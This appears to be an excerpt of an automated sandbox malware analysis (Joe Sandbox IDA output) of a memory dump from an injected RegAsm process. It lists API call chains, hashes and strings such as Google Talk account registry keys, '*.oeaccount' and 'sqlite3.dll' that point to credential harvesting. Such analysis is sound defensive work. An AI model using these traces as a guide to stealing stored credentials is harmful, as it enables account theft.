                                                                                                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                              • String ID: ACD
                                                                                                                                              • API String ID: 1886237854-620537770
                                                                                                                                              • Opcode ID: ba2fb1ebd6d34557563497b52043a7035be6948b79178427339670267c7a2de8
                                                                                                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                              • Opcode Fuzzy Hash: ba2fb1ebd6d34557563497b52043a7035be6948b79178427339670267c7a2de8
                                                                                                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2054149589-0
                                                                                                                                              • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                              • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                              • memset.MSVCRT ref: 00408620
                                                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                              • memset.MSVCRT ref: 00408671
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                              Strings
                                                                                                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                              • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                              • API String ID: 1366857005-1079885057
                                                                                                                                              • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                              • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                              • memset.MSVCRT ref: 00410E10
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                              • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                              Strings
                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseFolderLibraryLoadPathSpecialVersion_mbscpymemset
                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                              • API String ID: 218411198-2036018995
                                                                                                                                              • Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                              • Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cursor_mbsicmpqsort
                                                                                                                                              • String ID: /nosort$/sort
                                                                                                                                              • API String ID: 882979914-1578091866
                                                                                                                                              • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                              • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004109F7
                                                                                                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                              • memset.MSVCRT ref: 00410A32
                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3143880245-0
                                                                                                                                              • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                              • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: 503c09cd7de9972ac8ba5625359fc448a9b0e456fd4c2f147f53c83827732b04
                                                                                                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                              • Opcode Fuzzy Hash: 503c09cd7de9972ac8ba5625359fc448a9b0e456fd4c2f147f53c83827732b04
                                                                                                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                              • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                              • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00402A34
                                                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                                                                                                                                              • RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$Enummemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1615280680-0
                                                                                                                                              • Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                              • Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
                                                                                                                                              • Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                              • Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
                                                                                                                                              APIs
                                                                                                                                              • malloc.MSVCRT ref: 00406F4C
                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                              • free.MSVCRT ref: 00406F6D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: freemallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3056473165-0
                                                                                                                                              • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                              • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                              • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                              • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                              • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                              • String ID: sqlite3.dll
                                                                                                                                              • API String ID: 3677997916-1155512374
                                                                                                                                              • Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                              • Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
                                                                                                                                              • Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                              • Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID: eBD
                                                                                                                                              • API String ID: 823142352-44267735
                                                                                                                                              • Opcode ID: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                              • Instruction ID: a89d01311c626acd6708100a1c920bed7e48ab8185d3fa7f8c0eae74851e3e32
                                                                                                                                              • Opcode Fuzzy Hash: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                              • Instruction Fuzzy Hash: 10C012B0250300BEFF214F10EC46F37355DE740700F300424BE00F40E1C1A14D10C928
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                              • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                              • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strlen$_strcmpimemset
                                                                                                                                              • String ID: /stext
                                                                                                                                              • API String ID: 520177685-3817206916
                                                                                                                                              • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                              • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                              • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                              • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00402B44
                                                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                              • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1880195650-0
                                                                                                                                              • Opcode ID: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                              • Instruction ID: a6739743e39ca8df578777331d88ee5d3d666d95225ddaf8fc8e93cdb73399e2
                                                                                                                                              • Opcode Fuzzy Hash: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                              • Instruction Fuzzy Hash: 4811B975904109EFEB10DF95CD41ED9B77CEF20348F1004BAF988A2151EAB5AAC49B14
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                              • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                              • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1208763047-0
                                                                                                                                              • Opcode ID: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                              • Instruction ID: 6870f833a154d6718f5b937b5a7666aa62b37853351f5b72213b77096f12c34b
                                                                                                                                              • Opcode Fuzzy Hash: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                              • Instruction Fuzzy Hash: BE0162B2504209FEEB119BA09CC9DABBB6CEB14358F108277F605B51C1DA749E589A28
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00402ABC
                                                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                              • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Closememset$EnumOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1938129365-0
                                                                                                                                              • Opcode ID: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                              • Instruction ID: 075d2aef54253d1e507a5189515eddc1e36b9bc69c6417a4805569c48a28632c
                                                                                                                                              • Opcode Fuzzy Hash: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                              • Instruction Fuzzy Hash: E801ACB590010DAFEB20EF95CD85EEAB76CDF2434CF000076F544A1051FBB9AE989B64
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$FreeLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 534179979-0
                                                                                                                                              • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                              • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                              APIs
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4165544737-0
                                                                                                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                              APIs
                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Enum
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2928410991-0
                                                                                                                                              • Opcode ID: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                              • Instruction ID: 8a3f31470ea8a8b3d952542b098f2abe59e4a6ac9f2d43bd6bb9c8582bf8d7d6
                                                                                                                                              • Opcode Fuzzy Hash: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                              • Instruction Fuzzy Hash: 4AD067B950010EFFDF01DFA0ED45DBE7BBDEB04208F008061BD15D2151D7719A15ABA4
                                                                                                                                              APIs
